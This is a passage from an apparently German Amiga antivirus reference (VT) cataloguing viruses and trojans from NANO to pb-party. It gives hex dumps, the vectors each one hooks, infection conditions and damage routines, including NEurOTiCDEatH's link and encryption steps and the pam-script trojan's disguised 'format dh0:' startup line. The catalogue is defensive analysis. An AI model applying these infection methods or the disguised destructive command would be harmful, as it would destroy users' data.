  2343.        Yeah, SUPPLEX presents a new Mini-Virus-Killer !!!
  2344.        To Start write > MVK < and MVK is than aktiv in your Memory,
  2345.        don't panic it is not a Virus..........
  2346.        MVK-Archiv contains :
  2347.        MVK.exe
  2348.        Readme.file  ( You read this now )
  2349.  
  2350.       Im File ist uncodiert zu lesen:
  2351.           2A2C202F 41414600 F00F412E 492E442E *, /AAF.d.A.I.D.
  2352.           53205649 5255532D 48554E54 455200FF S VIRUS-HUNTER.y
  2353.  
  2354.       Es handelt sich also um eine Meisterleistung:
  2355.          - jemand hat es geschafft  L.A.D.S  in A.I.D.S  umzuwandeln.
  2356.          - jemand hat es geschafft mit einem UtilityPrg einen BB in ein
  2357.            ausfuehrbares Prg. umzuwandeln.
  2358.          - jemand hat es NICHT geschafft die codierte Graphik-Text-Routine
  2359.            zu aendern
  2360.       Es handelt sich also in Wirklichkeit um den LADS-BB-Virus. Lesen
  2361.       Sie bitte dort nach. Das Prg vermehrt sich NUR als BB. Da die
  2362.       DOS0-BB-Kennung fehlt, entsteht eine nicht bootbare Disk !!!
  2363.       VT erkennt im Speicher und beim FileTest LADS-Virus.
  2364.  
  2365.    - MwB-Virus BB   ein echter Julie s.o.
  2366.       Da der Julie.BB nicht den ganzen BB braucht, hat es jemand geschafft,
  2367.       einen Text einzubauen, der NIE erreicht wird. VT erkennt weiterhin
  2368.       Julie .      
  2369.            ccccc9df df000000 4d77422f 4777482f ........MwB/GwH/
  2370.            74686520 62657374 20696e20 686f6c6c the best in holl
  2371.            616e6400 00000000 00000000 00000000 and.............
  2372.  
  2373.  
  2374.    - NANO   File-Virus  Laenge: 1484 Bytes   KS2.04: ja
  2375.       Im Speicher immer ab: $7C000   Cool $7C0DE, OldOpenLib $7C1CC
  2376.       und SumKickData $7C3B2
  2377.       Grundgeruest ist die Compuphagozyte-Familie, erweitert um zwei
  2378.       Ausgaberoutinen.
  2379.       Schreibt in erste Zeile der startup-sequence:
  2380.         $A0A0A0A0A0A0," ",$0A
  2381.       Schreibt sich als unsichtbares ($A0A0A0A0A0A0) Programm in die
  2382.       Root-Dir (erzwungen durch : ).
  2383.       Beim Test gab es Probleme fuer das Virus-Prg, die richtige Startup-
  2384.       Sequence-Laenge zurueckzuschreiben. Sie muessen also mit dem Total-
  2385.       verlust der Startup-Sequence rechnen. Weiterhin wird die startup-
  2386.       sequence immer wieder verseucht (Beispiel s.u.), OHNE Test auf schon
  2387.       veraendert. Also eine typische ANFAENGER-Programmierung.
  2388.            a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a        .       .
  2389.            a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a        .       .
  2390.            a0a0a0a0 a0a0200a 636c730a 0a020000        .cls.....
  2391.  
  2392.       Hat zwei Zaehlzellen:
  2393.            a) Ausgabe der Deutschlandfarben
  2394.            b) DisplayAlert:
  2395.                     ... another masterpiece by  N A N O  !!!
  2396.         GREETINGS TO:
  2397.         Byte Bandit, Byte Warrior, DEF JAM, DiskDoktors
  2398.         FANTASY, Foundation For The Extermination Of Lamers,
  2399.         I.R.Q. Team, Obelisk Softworks Crew, S.C.A., UNIT A ...
  2400.       VT2.52 erkennt und loescht: 31.03.93
  2401.       Bitte denken Sie daran, auch die startup-sequence zu aendern !!!
  2402.  
  2403.    - Nano 2 FileVirus  Laenge: 1472 Bytes
  2404.       Im Speicher immer ab $7C000, Vektoren werden teilweise nach
  2405.       $7A000 gerettet.
  2406.       Namensbegruendung:
  2407.       Im File ist zu lesen:
  2408.        Virus in 9.91 by Nano  (die Jahreszahl duerfte falsch sein)
  2409.       Ein codierter Bereich fehlt im Gegensatz zu CompuPhagozyte 8
  2410.       ALLE verbogenen Vektoren und Routinen sind gleich, liegen aber
  2411.       natuerlich an verschobenen Speicherstellen, da der Eingangstext
  2412.       von CompuPhagozyte 8 laenger ist. Also lesen Sie bitte das gleiche
  2413.       Verhalten bei CompuPhagozyte 8 nach.
  2414.        Fehlerquelle2 :
  2415.        Das Virusteil verraet sich nach einem Reset und schreibge-
  2416.        schuetzter Disk mit einem SystemRequest:
  2417.                    Volume
  2418.                    xyz
  2419.                    is write protected
  2420.       VT loescht Nano2 . Sie muessen mit einem Editor die 1.Zeile
  2421.       der Startup-sequence loeschen !!!!!!
  2422.  
  2423.    - NaST  29.03.92  File    Laenge: 2608 Bytes
  2424.       auch KS2.04
  2425.       Grundgeruest: BGS9
  2426.          KickMem, KickTag, KickCheckSum, Openwindow (int.lib)
  2427.       Neu: $6c, FindTask, OldOpenLib, NewOpenLib
  2428.            dafuer fehlt decode BitPlanes
  2429.       Herkunft des Namens:  2x im Virus-File zu lesen
  2430.       verschiebt Orig-File unsichtbar nach c
  2431.        $A020A020A020202020A0202020A0
  2432.       VT versucht zuerst rename und falls OrigFile nicht gefunden,
  2433.       wird angeboten das Virus-File allein zu loeschen. Dann muessen
  2434.       Sie aber wahrscheinlich die 1.Zeile der startup-sequence aendern.
  2435.  
  2436.    - Nasty-Nasty  BB  nur KS1.2  immer ab $7F000
  2437.     Cool, DoIo, Userstate, Superstate, Alert
  2438.       Vermehrung und Schaeden:
  2439.          - BB
  2440.          - sobald die Zaehlzelle den Wert 5 erreicht hat:
  2441.                format Disk
  2442.       Das VirusPrg gibt keine Meldung aus. Im BB ist Nasty-Nasty! zu
  2443.       lesen.
  2444.  
  2445.    - NAZI-Virus  BB   s.u.  SCA-PKK  Virus
  2446.  
  2447.    - NComm32-Trojan   Zerstoerungsfile  siehe bei CoP-Trojan
  2448.       Anderer moeglicher Name: CIRCLE OF POWER Trojan
  2449.  
  2450.          
  2451.    - NEurOTiCDEatH-Virus  Typ 1  Linkvirus
  2452.       Namensbegruendung:    
  2453.            Im LinkTeil ist zu lesen:   
  2454.            00000000 2a5b6d75 54416765 4e325d2a ....*[muTAgeN2]*
  2455.            000000a0 0d2d2d2d 3d5b204e 4575724f .....---=[ NEurO
  2456.            54694320 44456174 48205d3d 2d2d2d20 TiC DEatH ]=---
  2457.       Fileverlaengerung: #3400-4200 Bytes
  2458.       Nicht Resetfest
  2459.       Ab KS 2.04
  2460.       Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2461.       Das Virusteil soll ab 21. Jan. 97 aktiviert werden.
  2462.       Speicherverankerung:
  2463.            - Test ob schon im Speicher
  2464.            - Loadseg NewLoadSeg DoIo werden verbogen
  2465.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2466.       Linkvorgang:
  2467.            - Mit LoadSeg
  2468.            - Medium validated
  2469.            - File ausfuehrbar ($3F3)
  2470.            - CodeHunk wird gefunden ($3E9)
  2471.            - Ueberlaeuft $3F1-Hunks
  2472.            - Filelaenge groesser #16384
  2473.            - File kleiner einem bestimmten Wert, abhaengig von der
  2474.              Gesamtblockzahl des Mediums.
  2475.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2476.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2477.              oder jsr -xy(a6) ($4EAE Fxyz)
  2478.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2479.            - das Teil codiert sich immer neu mit $DFF007
  2480.       Meldung:
  2481.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2482.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2483.            - Danach Reset
  2484.       Zerstoerung:
  2485.            - Mit DoIo
  2486.            - zerstoerter Block Blocknummer immer groesser #63
  2487.              Am Blockanfang ist dann zu lesen:
  2488.              Z    12 Bl     20
  2489.              00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D
  2490.              10: 45617448 205d3d2d 2d2d2020 28632920 EatH ]=---  (c)
  2491.              20: 31393937 20506f6c 616e6400 78e97fd1 1997 Poland.x..
  2492.            - Dieser Block ist NICHT zu retten
  2493.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2494.       VT versucht den Linkausbau bei einem ausfuehrbaren File.
  2495.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2496.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2497.  
  2498.          
  2499.    - NEurOTiCDEatH-Virus  Typ 2  Linkvirus
  2500.       Namensbegruendung:    
  2501.            Im LinkTeil ist zu lesen: 
  2502.            3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....-
  2503.            2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE
  2504.            61744820 32205d3d 2d2d2d20 20286329 atH 2 ]=---  (c)
  2505.       Fileverlaengerung: #3652-4452 Bytes
  2506.       Nicht Resetfest
  2507.       Ab KS 2.04
  2508.       Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2509.       Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2510.       Speicherverankerung:
  2511.            - Test ob schon im Speicher
  2512.            - Loadseg NewLoadSeg DoIo werden verbogen
  2513.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2514.       Linkvorgang:
  2515.            - Mit LoadSeg
  2516.            - Medium validated
  2517.            - File ausfuehrbar ($3F3)
  2518.            - CodeHunk wird gefunden ($3E9)
  2519.            - Ueberlaeuft $3F1-Hunks
  2520.            - Filelaenge groesser #12288
  2521.            - File kleiner einem bestimmten Wert, abhaengig von der
  2522.              Gesamtblockzahl des Mediums.
  2523.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2524.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2525.              oder jsr -xy(a6) ($4EAE Fxyz)
  2526.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2527.            - das Teil codiert sich immer neu mit $DFF007
  2528.       Meldung:
  2529.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2530.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2531.            - Danach Reset
  2532.       Zerstoerung:
  2533.            - Mit DoIo
  2534.            - zerstoerter Block Blocknummer immer groesser #63   
  2535.              Am Blockanfang ist dann zu lesen:  
  2536.              Z    33 Bl      6
  2537.              00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D
  2538.              10: 45617448 2032205d 3d2d2d2d 20202863 EatH 2 ]=---  (c
  2539.              20: 29203139 39372050 6f6c616e 6400f94c ) 1997 Poland..L
  2540.            - Dieser Block ist NICHT zu retten
  2541.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2542.       VT versucht den Linkausbau bei einem ausfuehrbaren File. 
  2543.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2544.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2545.  
  2546.          
  2547.    - NEurOTiCDEatH-Virus  Typ 3  Linkvirus
  2548.       Namensbegruendung:    
  2549.            Im decodierten LinkTeil ist zu lesen: 
  2550.            3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....-
  2551.            2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE
  2552.            61744820 33205d3d 2d2d2d20 20202863 atH 3 ]=---   (c
  2553.       Fileverlaengerung: #4064-4864 Bytes
  2554.       Nicht Resetfest
  2555.       Processor besser als 68000
  2556.       Verbogene Vektoren: LoadSeg DoIo
  2557.       Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2558.       Speicherverankerung:
  2559.            - Test ob schon im Speicher
  2560.            - Test ob Antivirusprg.e aktiv  (z.B Vir...)
  2561.            - Loadseg und DoIo werden verbogen
  2562.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2563.       Linkvorgang:
  2564.            - Mit LoadSeg
  2565.            - Medium validated
  2566.            - File ausfuehrbar ($3F3)
  2567.            - CodeHunk wird gefunden ($3E9)
  2568.            - Ueberlaeuft $3F1-Hunks
  2569.            - Filelaenge groesser #12288
  2570.            - File kleiner einem bestimmten Wert, abhaengig von der
  2571.              Gesamtblockzahl des Mediums.
  2572.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2573.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2574.              oder jsr -xy(a6) ($4EAEwxyz)
  2575.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2576.            - das Teil codiert sich immer neu mit $DFF007
  2577.       Meldung:
  2578.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2579.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2580.            - Danach Reset
  2581.       Zerstoerung:
  2582.            - Mit DoIo
  2583.            - zerstoerter Block Blocknummer immer groesser #63
  2584.            - Routine: move.l d0,(a2,d1.w)
  2585.              Da das geschriebene LW (d0) sich IMMER aendert, kann VT
  2586.              so einen Block NICHT erkennen !!!!
  2587.            - Dieser Block ist NICHT zu retten
  2588.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2589.       VT versucht den Linkausbau bei einem ausfuehrbaren File.   
  2590.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2591.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2592.                  
  2593.    - NEurOTiCDEatH-Virus  Typ 5  Linkvirus
  2594.         Name NICHT nachvollziehbar, sondern uebernommen
  2595.            Im decodierten LinkTeil ist zu lesen:  
  2596.            8002ee58 32c04e75 00000002 00005b4d ...X2.Nu......[M
  2597.            74675f33 415d0000 1bdf0000 00096100 tg_3A]........a.
  2598.         Im Vergleich zu Typ 3 habe ich also keinen Neuro..-Text
  2599.         gefunden
  2600.         Fileverlaengerung: groesser #6000 Bytes und kleiner #8000 Bytes
  2601.             (so war es bei meinen Tests)
  2602.         Nicht Resetfest
  2603.         Processor besser als 68000
  2604.         Nicht alle Kickstart-Versionen
  2605.         Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2606.         Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2607.         Speicherverankerung:
  2608.            - Test ob schon im Speicher z.B. DebugData
  2609.            - Test ob Antivirusprg.e aktiv  (z.B Xtruder)
  2610.            - Loadseg NewLoadSeg und DoIo werden verbogen
  2611.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2612.         Linkvorgang:
  2613.            - Mit LoadSeg und NewLoadSeg
  2614.            - Medium validated
  2615.            - File ausfuehrbar ($3F3)
  2616.            - CodeHunk wird gefunden ($3E9)
  2617.            - Ueberlaeuft $3F1-Hunks
  2618.            - Filelaenge groesser #32768
  2619.            - File kleiner #286720
  2620.            - Gesucht wird im 1.Hunks nach bcc ($6v00wxyz),
  2621.              jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAEwxyz)
  2622.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2623.            - das Teil codiert sich immer neu mit $DFF007
  2624.         Meldung:
  2625.            - KEINE
  2626.         Zerstoerung:
  2627.            - Mit DoIo Speichermuell schreiben
  2628.            - zerstoere Zufalls-Block in Abhaengigkeit von $DFF006
  2629.            - Zufallsblock immer groesser #63 ($7E00)
  2630.            - VT kann  so einen Block NICHT erkennen
  2631.            - Dieser Block ist NICHT zu retten
  2632.         VT versucht die Vektoren im Speicher zurueckzusetzen.
  2633.         VT kann nicht alle Files reparieren.
  2634.         Falls es zu Fehlerkennungen am File kommt, schicken Sie mir
  2635.         bitte solche Files.
  2636.  
  2637.    - New Age Virus    Link
  2638.       Verbogener Vektor: DosWrite
  2639.       Verlaengert ein File um 668 Bytes
  2640.       KS 1.3: nein
  2641.       KS 2.0: ja    mit Test ob in dos.lib $4EF9 verwendet wird
  2642.       Nicht Resetfest
  2643.       Verseuchte Files sind SELTEN lauffaehig. VT bietet nur loeschen
  2644.       an.
  2645.       Im verseuchten File ist uncodiert zu lesen:  
  2646.            4bc20000 00030032 4e657720 41676520 K......2New Age
  2647.            56697275 7320a920 31393932 20427920 Virus . 1992 By
  2648.            4576696c 204a6573 7573646f 732e6c69 Evil Jesusdos.li
  2649.       Vermehrungsbedingungen:
  2650.             File groesser 4096 Bytes
  2651.             File kleiner 65536 Bytes
  2652.             File ist ausfuehrbar 3F3
  2653.             Die ersten vier Bytes im 1.Hunk enthalten nicht
  2654.               $4e75 oder $4AFC   (wg. Lib)
  2655.       Das Teil schreibt sich an den Anfang des 1.Hunks und verschiebt
  2656.       den Rest. Die HUNK-Reloc-Behandlungsroutine ist so schlecht, dass
  2657.       kaum ein verseuchtes File richtig arbeiten kann.
  2658.  
  2659.  
  2660.    - Nibbler-Inst.     Installer fuer Nibbler-Virus  siehe unten
  2661.        Bekannter Filename: cpu
  2662.        Laenge: 4584 Bytes
  2663.        Das Virusteil sitzt mitten im 1.Hunk. So kann sich das Teil
  2664.        NICHT selbst anlinken.
  2665.  
  2666.  
  2667.    - Nibbler-Virus      File  Link
  2668.        anderer moeglicher Name: Biochip
  2669.        Fileverlaengerung: 924 Bytes
  2670.        ab KS2.04: ja
  2671.        Mehrfachlinks: ja  (nach Virusprg. sollte das nicht sein)
  2672.        Namensbegruendung:  im Linkteil ist uncodiert zu lesen:
  2673.             2d6c0298 ff6c6000 02944e69 62626c65 -l...l`...Nibble
  2674.             7220312e 30626574 61202d20 78782f78 r 1.0beta - xx/x
  2675.             782f7878 202d2062 79204269 6f636869 x/xx - by Biochi
  2676.             7020432e 20230000                   p C. #..
  2677.        Verbogener Vektor: LoadSeg
  2678.        Resetfest: Nein
  2679.        Link hinter den ersten Hunk.
  2680.        VT versucht Loadseg im Speicher zurueckzusetzen.
  2681.        VT versucht den Linkteil aus einem File auszubauen.
  2682.        Speicherverankerung:
  2683.          - VirusZ, SnoopDos usw. nicht im Speicher
  2684.          - LoadSeg wird verbogen
  2685.        Vermehrungsbedingungen:
  2686.          - File ist noch nicht verseucht (Test auf "OS")
  2687.            Diese Abfrage arbeitet bei hoeheren Prozessoren nicht
  2688.            richtig. Folge: Mehrfachlinks
  2689.          - Filename enthaelt nicht "VI","VW","VT" usw.
  2690.          - min. Filelaenge #2300 Bytes
  2691.          - File ausfuehrbar
  2692.          - 3E9-Hunk wird gefunden  (Loop)
  2693.            Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!!
  2694.          - Disk validated
  2695.          - kein Fremdformat "BAD" oder NDOS
  2696.          - mind. 50 Block frei
  2697.          - RTS wird gefunden
  2698.          - RTS wird ersetzt durch bra.s
  2699.              Hinweis: Da die RTS-Suchschleife falsch programmiert ist
  2700.              (Anfaenger !!!), koennen nicht-lauffaehige Programme ent-
  2701.              stehen.
  2702.          - rettet FileProtection, FileComment und FileDate
  2703.              Die veraenderten Files waeren aber von aelteren VT-Vers.
  2704.              dennoch erkannt worden, wenn Sie Vorsorge getroffen haetten,
  2705.              und fuer die Files in c, devs, libs usw. mit VT vorher (!!!)
  2706.              Pruefsummen gebildet haetten.
  2707.        Das Teil meldet sich nicht.
  2708.        Hinweis:
  2709.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  2710.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  2711.          wird dadurch geringer.
  2712.  
  2713.    - NO BANDIT   (siehe unten Virenfinder)
  2714.  
  2715.    - NoCare-Virus   s.o. Labtec-Trojan
  2716.  
  2717.    - No head     s.b. ByteBanditPlus
  2718.  
  2719.    - No Name 1    anderer und richtiger Name :  Byte Bandit 2
  2720.       kein FastMem, BeginIo, KickTag, KickCheckSum, Vec5
  2721.       SpeicherLage ueber structMemList, Speicherreservierung fuer
  2722.       neuen  BBVirus mit allocmem, Zaehlstelle: Virusstart + $1c
  2723.       Vermehrung: ueber BB
  2724.       Im BB lesbar: trackdisk.device (weit unten)
  2725.       ein ByteBanditClone, ohne Tastaturabfrage, nur 5 Kopien und
  2726.       kuerzer gesetzter Zeit
  2727.  
  2728.    - NoName2   BB   Cool, DoIo, SumKickData  auch KS2.04
  2729.       Vermehrungszaehler: bei mir  $269
  2730.       Es ist mir ein Raetsel, warum dieser BB solange unbemerkt bleiben
  2731.       konnte. Im letzten Jahr hat es kein Virus weiter als $10 ge-
  2732.       bracht. Dann hat ihn jemand spaetestens entdeckt.  ???
  2733.       Erstinstallierung im Speicher von BB:
  2734.       Falls Cool und KickTag nicht Null oder DoIo nicht Original, dann
  2735.       RESET.
  2736.       Nach Installierung und Reset sichert der Virus sein Prg durch
  2737.       AllocAbs.
  2738.       Vermehrung und Schaden:
  2739.       ueber BootBlock
  2740.       Rueckgabewert von SumKickData in d0 enthaelt Wert aus $DFF006.
  2741.       Virus meldet sich NIE. Kein Name versteckt oder codiert, deshalb
  2742.       NoName2 . Im BB ist ab $264  trackdisk.device zu lesen.
  2743.  
  2744.    - No-Guru V2.0   Filelaenge: 1224 Bytes (mit PP-Data-Prg.teil)
  2745.       Nach meiner Meinung nur gefaehrlich fuer AmiExpress-Benutzer
  2746.          (hab ich nicht)
  2747.       verbiegt: Alert, Autorequest
  2748.       Textausgabe im Cli:   u.a.
  2749.          Making life with AmiExpress just that little bit easier...
  2750.       Sucht nach bss:user.data ; Falls vorhanden werden $8000 Bytes
  2751.       geladen. Der geladene Teil wird nach renegade, jock rockwell
  2752.       oder spiral durchsucht und gegebenenfalls geaenderte Daten
  2753.       zurueckgeschrieben.
  2754.       Empfehlung: loeschen
  2755.  
  2756.    - NorthStar   anderer Name: Starfire  s.u.
  2757.  
  2758.    - NoVi   (File)  TerroristsClone s.u.  Laenge:1612 Bytes
  2759.       Aenderungen: TTV1 geaendert in NoVi
  2760.          Orig-File wird jetzt nach sys:c/.fastdir,$A0 verschoben.
  2761.  
  2762.    - Nuked007    siehe bei SHIT
  2763.  
  2764.    - Obelisk1  ( Deutschlandfahne + Graphiktext) Einsprung:cool
  2765.                schreibt in Speicherstelle $00000060 das Wort GURU
  2766.                zerstoert damit den Ausnahmevector, der ins ROM
  2767.                IR-Ebene 7 zeigt !!
  2768.  
  2769.    - Obelisk2   Begin, KickTag, KickCheckSum, Vec5
  2770.                 Einsprung:KickTag ,drei ZaehlZellen, Ausgabe:Graphik-
  2771.                 text mit FormatAndrohung, wird nur durch KopfAnschlag
  2772.                 vorgetaeuscht !! Nachweis mit TrackDisplay !!
  2773.                 Speicherstelle $60 s.o.
  2774.  
  2775.    - O.M.S.A Virus  BB   TimeBomb V1.0 Clone  siehe unten
  2776.          Nur Texte geaendert.
  2777.             Text fuer DisplayAlert:
  2778.            14486568 652e2e2e 4c6f6f6b 73206c69 .Hehe...Looks li
  2779.            6b652079 6f757220 6469736b 20676f74 ke your disk got
  2780.            20667563 6b656421 2054616b 65206120  fucked! Take a
  2781.            73686f77 65722121 21000000 42b90007 shower!!!...B...
  2782.             Namensbegruendung:
  2783.            4f2e4d2e 532e4120 76697275 73207631 O.M.S.A virus v1
  2784.            2e302100 00000000 00000000 00000000 .0!.............
  2785.  
  2786.  
  2787.    - OP1    (Neuseeland)  richtiger Name: Joshua
  2788.  
  2789.    - OPAPA     Begin, KickTag, KickCheckSum, Vec5
  2790.                Zaehlzelle: ja, Vermehrung: ueber BB jedes LW
  2791.                Textausgabe (ueber Graphik) OPAPA-VIRUS READY STEADY FORMAT
  2792.                Kopf steppt nach Track 0 alle LW
  2793.          Clone: 04.03.92   Text entfernt
  2794.  
  2795.    - Overkill VIRUS  BB  Block 0-3  auch KS2.04, immer ab $7F700
  2796.          Cool, KickCheckSum,SumKickData, DoIo
  2797.          fordert trackdisk.device NICHT   = auch HD !!!!!!!
  2798.          Namensbegruendung:
  2799.          decodiert ist im Speicher zu lesen: Overkill by the ENEMY !
  2800.          Decodierroutineteil:
  2801.             sub.b d6,d5
  2802.                         move.b d5,(a5)+
  2803.          holt 4 Bloecke:
  2804.          Block 0 u. 1 = Virus
  2805.          Block 2 u. 3 = OrigBB  nicht codiert
  2806.          Vermehrung:
  2807.          Codiert jeden Virus fuer BB neu in Abhaengigkeit von $DFF006
  2808.          speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt,
  2809.          wird zerstoert.
  2810.          Schaden: (auch HD!!!!!!!!)
  2811.          - Bestimmt ueber $DFF006 eine Blocknummer
  2812.          - Schreibt ZWEI Bloecke (ist neu) mit Speicherinhalt.
  2813.            d.h. im unguenstigen Fall wird Block1 an das Ende eines Files
  2814.            und Block2 an den Beginn eines zweiten Files geschrieben.
  2815.            Diese Files sind NICHT zu retten. Im 1.ZerstoerungsBlock
  2816.            steht ab $22 Overkill by the ENEMY !. Da KEINE Blockaus-
  2817.            wertung erfolgt, kann auch ein Dir-Block, ListBlock usw.
  2818.            zerstoert werden. Versuchen Sie bitte mit disksalv zu retten,
  2819.            was noch brauchbar ist.
  2820.            Zyl 0 Block  55
  2821.                ^
  2822.          0000: 0007f708 00000000 4afc0007 f7080007 ........J.......
  2823.          0010: ff00011f 00450007 f7220007 f7220007 .....E..."..."..
  2824.          0020: f7d64f76 65726b69 6c6c2062 79207468 ..Overkill by th
  2825.          0030: 6520454e 454d5920 21002879 0007fab0 e ENEMY !.(y....
  2826.            Sie sehen: Es kann auch den Rigid-Bereich erwischen !!!
  2827.  
  2828.            Mit OrigBB koennen Sie den Block2-3 nach Block0-1 kopieren
  2829.            und abspeichern.
  2830.            VT kennt BB und Speicher: 17.10.92
  2831.  
  2832.    - pam-script-Trojan      format dh0:
  2833.          Keine Vermehrung
  2834.          Keine verbogenen Vektoren
  2835.          Nicht resetfest
  2836.          VT bietet loeschen an.
  2837.          Es sind zwei Teile notwendig.
  2838.          a) startup-sequence:
  2839.             pamela2/freemem jpeg1 dh0: pics pam
  2840.           Das bewirkt in Wirklichkeit:
  2841.             pamela2/format  drive dh0: name pam
  2842.          b) Ein aelterer format-Befehl (L: 12840), der in freemem umbe-
  2843.             nannt wurde. Weiterhin wurden einige ASCII-Zeichen umgeaendert.
  2844.             Die Laenge der Zeichenfolge wurde beibehalten (pics=name).
  2845.             Die Zeile in der startup-sequence soll dadurch einen anderen
  2846.             Sinn vorspielen.   
  2847.          Format orig.                 Freemem
  2848.          4e4f4943 4f4e5300 NOICONS. : 73686f77 70696300 showpic.
  2849.          51554943 4b004646 QUICK.FF : 56455230 31007878 VER01.xx
  2850.          53005573 6167653a S.Usage: : 78004a50 45472020 x.JPEG
  2851.          20257320 44524956  %s DRIV : 20257320 70696373  %s pics
  2852.          45203c64 69736b3e E <disk> : 20206c6f 61646572   loader
  2853.          204e414d 45203c6e  NAME <n : 206c6f61 64207878  load xx
  2854.          616d653e 205b4646 ame> [FF : 616d653e 205b756e ame> [un
  2855.          535d5b4e 4f49434f S][NOICO : 72656769 73746572 register
  2856.          4e535d5b 51554943 NS][QUIC : 65642056 322e3031 ed V2.01
  2857.          4b5d0a00 69636f6e K]..icon : 2e5d0a00 69636f6e .]..icon
  2858.          2e6c6962 72617279 .library : 2e6c6962 72617279 .library
  2859.          00004452 49564500 ..DRIVE. : 00006a70 65673100 ..jpeg1.
  2860.          44524956 45004472 DRIVE.Dr : 44524956 45005479 DRIVE.Ty
  2861.          69766520 6e6f7420 ive not  : 70653a70 616d656c pe:pamel
  2862.          666f756e 640a0000 found... : 6173686f 770a0000 ashow...
  2863.          4e414d45 00004e41 NAME..NA : 50494353 00005049 PICS..PI
  2864.          4d450000 496e7365 ME..Inse : 43530000 4c6f6164 CS..Load
  2865.          72742064 69736b20 rt disk  : 696e6720 70696373 ing pics
  2866.          746f2062 6520696e to be in : 21212121 21202020 !!!!!
  2867.          69746961 6c697a65 itialize : 20202020 20204849       HI
  2868.          6420696e 20257320 d in %s  : 54205245 5455524e T RETURN
  2869.          616e6420 70726573 and pres : 21212120 20202020 !!!
  2870.  
  2871.  
  2872.    - PARADOX I  KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F800
  2873.                Vermehrung und Schaden: Bootblock
  2874.                Text sichtbar im BB:
  2875.                * A new age of virus-production has begun ...
  2876.                This time PARADOX brings you the "LOGIC BOMB" Virus !!! *
  2877.  
  2878.    - PARADOX II  Kicktag, KickChecksum im Prg. DoIo u $6c, immer $7F000
  2879.                verschluesselt mit move.b $DFF006,D1 und eor.b d1,(a0)+
  2880.                Vermehrung und Schaden: Bootblock
  2881.                Text nach Entschluesselung:
  2882.                This is the second VIRUS by PARADOX  -
  2883.                For swapping call: 42-455416 - ask for Hendrik Hansen
  2884.  
  2885.    - PARAMOUNT  nur KS1.2 Kicktag, KickCheckSum, DoIo, immer $7F800
  2886.                Byte-Warrior-Clone, loescht Cold und Cool
  2887.                fordert trackdisk.device NICHT
  2888.                Vermehrung:BB
  2889.                im BB zu lesen: PARAMOUNT SOFTWORKS usw.
  2890.  
  2891.    - PARATAX   SCA-Clone, Cool immer 7EC3E, nur anderer Text
  2892.  
  2893.    - PARATAX II    Disk-Dokters-Clone, nur KS1.2 da DoIo-ROMEinsprung
  2894.                Cold, Cool, DoIo, im Prg. Vec5
  2895.                im BB sichtbar: PARATAX II
  2896.                clipboard.device durch ".dos.library" ersetzt
  2897.                je nach Zaehlerstand wird eigener BB geschrieben oder
  2898.                Disk ab Cylinder 40 (ROOT) formatiert
  2899.  
  2900.    - PARATAX III    16BitCrewClone   s.o.
  2901.                Unterschied: The 16Bit Crew 1988 in  PARATAX III (!!!)
  2902.                             geaendert
  2903.                eine echte Meisterleistung
  2904.  
  2905.    - Parfum-Virus   Saddam-Disk-Validator-Clone  s.u.            
  2906.            6b2e6465 76696365 00010820 50617266 k.device... Parf
  2907.            756d2056 69727573 00000000 03f30000 um Virus........
  2908.  
  2909.    - PayDay   BB  eigentlich ein AntiVirusBB   schauen Sie unten
  2910.  
  2911.    - pb-party-BBS-Trojan    Zerstoerungsfile  gegen BBS
  2912.         Laenge: 161984 Bytes
  2913.         Keine verbogenen Vektoren
  2914.         Nicht resetfest
  2915.         VT bietet Loeschen an
  2916.         Schaden: Mit Dos-Routinen soll userdata geloescht werden. Das
